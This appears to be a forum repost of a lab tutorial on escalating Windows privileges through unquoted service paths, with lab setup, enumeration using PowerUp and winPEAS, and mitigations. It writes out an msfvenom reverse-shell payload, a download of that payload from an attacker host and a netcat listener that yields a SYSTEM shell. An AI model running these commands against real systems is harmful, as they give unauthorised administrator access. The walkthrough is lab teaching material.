• We just launched and are currently in beta. Join us as we build and grow the community.

Windows Privilege Escalation: Unquoted Service Path

supremeusa

Blockchain Developer
S
S Rep
0
0
0
Rep
0
S Vouches
0
0
0
Vouches
0
Posts
64
Likes
145
Bits
0
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
Microsoft Windows offers a wide range of fine-grained permissions and privileges for controlling access to Windows components including services, files, and registry entries. Exploiting Unquoted Service path is one technique to increase privileges.

Unquoted Path or Unquoted Service path is reported as a critical vulnerability in Windows, such vulnerability allows an attacker to escalate the privilege for NT AUTHORITY/SYSTEM for a low-level privilege user account.

image.png


Table of Content
  • Introduction
  • Vulnerability Insight
  • Prerequisite
  • Lab Setup
  • Abusing Unquoted Service Paths
  • Mitigation

Introduction

Unquoted Service Path

If the path to the service binary is not enclosed in quotes and contains white spaces, the name of a loophole for an installed service is Service Unquoted Path. As a result, a local user will be able to elevate the privilege to administrator privilege shell by placing an executable in a higher level directory within the path.

Mitre ID: T1574.009

Tactics: Privilege Escalation & Persistence

Platforms: Windows

Vulnerability Insight

The Windows API must assume where to find the referenced application if the path contains spaces and is not enclosed by quotation marks. If, for example, a service uses the unquoted path:

Vulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe

The system will read this path in the following sequence from 1 to 4 to trigger malicous.exe through a writeable directory.

C:\Program.exe

C:\Program Files\Ignite.exe

C:\Program Files\Ignite Data\Vuln.exe

C:\Program Files\Ignite Data\Vuln Service\file.exe

Prerequisite

Target Machine: Windows 10

Attacker Machine: Kali Linux

Tools: SubinACL, PowerUP.ps1, Winpeas.

Condition: Compromise the target machine with low privilege access either using Metasploit or Netcat, etc.

Objective: Escalate the NT Authority /SYSTEM privileges for a low privileged user by exploiting unquoted path Vulnerability.

Lab Setup

To set up a vulnerable environment for Unquoted Path, we need user accounts. Here we have user “ignite” who is a member of the Administrator group and “Shreya” who is a member Users group.

Code: 
net user ignite
net user shreya

AVvXsEg9ZHz7cD9Le7tNHh7hUFAN5MB6Phd7W9loqulfH4x-THBuUKj3YK0k6P4bsA7X6z8fnaIbi78vCLxd0_YIDPgDwLLTcBxRCKk1B9-4QNHT9MPmnSM0JVunJR5MhXQYx6oGrVpB9OKg0N2Eyt86r9tI0BcCaOo7wssru2bC9fxcZ8UyC3ZfsnVNPgpXmg=s16000


Steps to Setup Vulnerable Environment

Step1: Create a new folder and Sub Folder and named it “Ignite Data” & “Vuln Service” respectively

Code: 
mkdir "C:\Program Files\Ignite Data\Vuln Service"

Step2: Create vulnerable service with name file.exe

Code: 
sc create "vulns" binpath= "C:\Program Files\Ignite Data\Vuln Service\file.exe" start= auto

AVvXsEhS5epZVlheDhAHnTwrWmxqiz6ag81IT5OauolpG3y2frZbvNGFXti3GBxYpoICbOBsWNQrh48ku2G_K_hQBG4MPVMOmuyVG_H7uM5dOUyeU6QTJan_XtZDH_sOoJouOELKoXWysvCONM3-OfMGIpuJc-R8sCpkFdEX5rewtUywLRVqxID_D_7eENU9jQ=s16000


Step3: Grant writeable for BUILTIN\Users on Ignite Data folder with the help of icacls

Code: 
icacls "C:\Program Files\Ignite Data" /grant "BUILTIN\Users":W


*icacls
Click to expand...

is Microsoft Windows native command-line programmes that can display and modify permissions on directories and files.
Click to expand...


AVvXsEgi7vvII1haOA4-I4LUR4_o1IjspA7iVGWeFCZPwj8GM4YEXKhPOeRy7SULa6Ld7oc3MmrD7LxIK07GP9Zv_aNXclaXwFqjoTHFlYTiz5jm6LnEShc5p6SLkWA7b8B3iOkBg5Is7A81CAIrmAVHrRb61HNgWjxTzMWCLfNNSqr0D5I5LNM3Xnnn0mo4SA=s16000


Step4: To create a vulnerable service we need to assign some toxic privilege with the help of SubinACL to change the permission of services.

NOTE:


SubInACL is a little-known command-line tool from Microsoft, yet it is one of the best tools to work with security permissions in Windows. This tool is capable of changing the permissions of files, folders, registry keys, services, printers, cluster shares and various other types of objects.
Click to expand...



In this case, we have granted a user permissions to suspend (pause/continue), start and stop (restart) a service. The full list of the available service permissions:
Click to expand...


Step5: After Download SubinACL, execute the following command to assign PTO Permissions user “ignite” against “Pentest” service.

Code: 
subinacl.exe /service vulns /grant=msedgewin10\shreya=PTO

AVvXsEjMAuxVMBVDRdc0fI9COItStL-wq8w51cxAUBN6T7C2pro9WS-rAfJgps3DEUEhqe3EeHyPEW6b0ycQZYefqDsXK0rklAKOKoQFwtEb5Nz56Ogz2x8rc71mWvokbSGbJRPbEuBCoFqYRu_P_VlVyrO-BbqK5j8d4HIylUYV-_OJV2xujzcK0cnDsboPpw=s16000


Abusing Unquoted Service Paths

Abusing unquoted service is a technique that exploits insecure file permission in order to escalated privileges for local users. Download the PowerUp.ps1 script inside Kali Linux which will return the name and binary path for services with unquoted paths that also have a space in the name.

Code: 
wget https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
python –m SimpleHTTPServer 80

AVvXsEhFDuUw9OIvHiZvpQJ5B4G7M-VqzSR6unl7nkcSkEC_PqeMbK5kogcIEBMiLkg6-mWqrebJ3ndltSIPz4VeEmBwr5QBuiwBarNC5MmoKYd4uvh_FFUUjGEvVK3CEdOrEp2KHwwd1TWmajkeCGfU5KG9r5SaR05pfvyYlPDKAMVS6GQll8MMa-7kQizCmw=s16000


Get the initial access of the target machine and transfer the PowerUp.ps1 and execute the Get-UnquotedService command that will use Get-WmiObject to query all win32_service objects and extract out the binary pathname for each. Then checks if any binary paths have a space and aren’t quoted.

Code: 
nc –lvp 1245
powershell
wget http://192.168.1.3/PowerUp.ps1 -o PowerUP.ps1
powershell –ep bypass
Import-Module .\PowerUp.ps1
Get-UnquotedService

As result, we have enumerated the path for file.exe as highlighted in the below image.

AVvXsEgq4iOU7D0Q3XwnwOKQHnh1KlNG_EkcHgT4ObZG68KGPwwuWorOaymuu23sC-84FqRh_Vbqw9-0M7qylMH7r8uzgCRiQJjRVwbxCs3_P5OmCf6DWQlgNQOyALXcJydPfPrFUj_xHMj044ZCoG1cfNOurrPpMJgT_GuTMXLKJ13vqRqjC1FPZLw71spnjQ=s16000


From above, we enumerate three subdirectories: “Program Files,” “Ignite Data,” and “Vuln Service,” and for each directory, we use icacls to check permissions.

Code: 
icacls "C:\Program Files"
icacls "C:\Program Files\Ignite Data"
icacls "C:\Program Files\Ignite Data\Vuln Service"

Here we found BUILTIN\Users owns writable permissions against “Ignite Data”

AVvXsEgX_wQ_iqU3I5MhOtVkjSvABHxOsvlEQlRZWmhjfZ0eAnrLJX_fSjKGptfJg2iAhbgHj1WkKj1KZWvh8tgcwRYPTZ_WfnwPcbn9VHHvPyLVqUcxqv9BXqfYERyvBqdcrrkCflEAD38YmQzd6bEg2ciyyHQux13t10t--b2ksTyJg0CCWjgwtZ1ZTLYL9g=s16000


Using auto script WinPEASx64 we enumerate the suspicious file and folder for the unquoted path.

Code: 
winPEASx64.exe quiet servicesinfo

AVvXsEhNd5FBNPzz8w-AYNNhGLOYh5FJ98S78rXDzzF5k35iJwxUwop6otCGbvoV7Pl606Jz_RXP1OLExm2nG4IZigJkXV4z93WZCKI12BGhojHJHe224Lgvy2ATePr1NxakAAEUC2VzosCMFBZpC72pKmVRwpcURKDLMg49-iBVu4Iic0SG9jGp2He_n6DhEA=s16000


As result, it shown the same as above.

AVvXsEjk2mS9JcKl6dXZRmMRSpDLbhoiBr24cg2mJKhwLkrkz2WQ5-8xMFE53JxLz_hMmbPnTnHx2ucmM20Ofnb_cOC9IniMXhqiT13E0UbvMZMoTBep_wytdz2k5wpclLsqNqDAXBJFyWIB5Z9sGaGGOnN7FxR9zZwZ8D5UFuB9DXHaOCV2sZ9nBGKsf5ENQQ=s16000


It’s time to exploit the weak configured services against unquoted paths in order to privilege for user Shreya. As we know unquoted folder name is Vuln Service thus we will create a file with the name Vuln.exe with the help of msfvenom.

Code: 
msfvenom –p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 –f exe > Vuln.exe
python –m SimpleHTTPServer 80

AVvXsEgA0Fz7IUeByZ6JTLKyjGWsc86Kfa22BZO0F0l0lVv0jApPhs6R09jfx7PSmK_BMn-EFx0-wNgiGb_LDUrG6paTxfz_1gEXNGIqwnAkYheUMoKt7US5_KVMIgQMwNK7d6HeSNbYUgdM-RIhfjeJtA2VMgJx8SMtyp2geq9zqIYvnJHcEIvsfCwCBvGIRQ=s16000


Start a fresh netcat listener in a new terminal and transfer the Vuln.exe onto the target machine’s “Ignite Data” folder. Since Shreya is a member of BUILTIN/Users has writable permission for “Ignite Data, and restarting the service will result in a reverse connection.

Code: 
cd c:\Program Files\Ignite Data
powershell wget http://192.168.1.3/Vuln.exe -o Vuln.exe
net start vulns

AVvXsEg2_e-ZHIFu-E_jvMhtD8xQGCHwXnw4Mnjlo5j1ZkfsHhLsX5cwqT8plLORY7yvaZmqsIgPpgUWpN-77x6b_JjAWjBr1g09qQTK1KfYo6Bz1oDJoF9_fNBhaq-cpzhBYm37GQuQT5ICwWqdv7dop8mKUw_3CJHHtgRKnOX5Ffhjxn1GYW5BYD5qEX5RwA=s16000


As soon as the service will launch, the attacker will get a reverse connection in the new netcat session as NT Authority \system

Code: 
nc –lvp 8888
whoami

AVvXsEhspTpaqNDpSYZeLSihUuAEJ6l-cL2PROsFZ4G7IP7v3CTQfTAUkMWljTgpkDCehAkERv5gEmYyyyW61_GeQwTsJhvENlMpMSJVR7AxUVfB8XMMgCdXkCkRo2QRPUEkNrRfP5G8emVbdqHOPZXxuX-JDYCbZl9BX3l4I8S830pKSLh8xRbJ3CQyW2KGwA=s16000


Even if the user has the option to restart the system, this approach will automatically restart the Vuln.exe service, which will offer a reverse connection.

Code: 
shutdown /r /t 0

AVvXsEgALguYOBH30gnfguFhdPRKy9cWqrk0wQRZ86wbqv8RIVptyavCP5Fu-TNTTdyfjpnQ4FjP1prI-DDQawHy-bh5pLLy5XIQO4to73LRhuyXxPSvAFVWu4WRfWLPFErYiHlQ4EW4pkPfs2tugi2wQgFI226ZP3X9b_ZP__JfiCsPKShke7Bu1EXoxoGMsg=s16000


As soon as the service will launch, the attacker will get a reverse connection in the new netcat session as NT Authority \system

Code: 
nc –lvp 8888

AVvXsEgSkgsNno86P05mJhxZYcsACZ1fTqmIUphEcO0TfW5AWs2iAaZbmBhGfbKhN5nxDRy_fSfSZ5n5s1frbXukUY_O9rKnTsSsYJBzQHDmkjpgv7y3us8jSpXmSMNjyGyKSNz68vTzWwe9-rO5t33Po3DfpkCrcbUCM7jrLuCBum60rY8IVISz6xygpWFYMg=s16000


Mitigation

Vulnerability Solution: Ensure that any services that contain a space in the path enclose the path in quotes.

Restrict File and Directory Permissions: Restrict access by setting directory and file permissions that are not specific to users or privileged accounts

Execution Prevention: Block execution of code on a system through application control, and/or script blocking.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
 
You must log in or register to reply here.

442,401

317,942

317,951

H HOUYOU.52
Top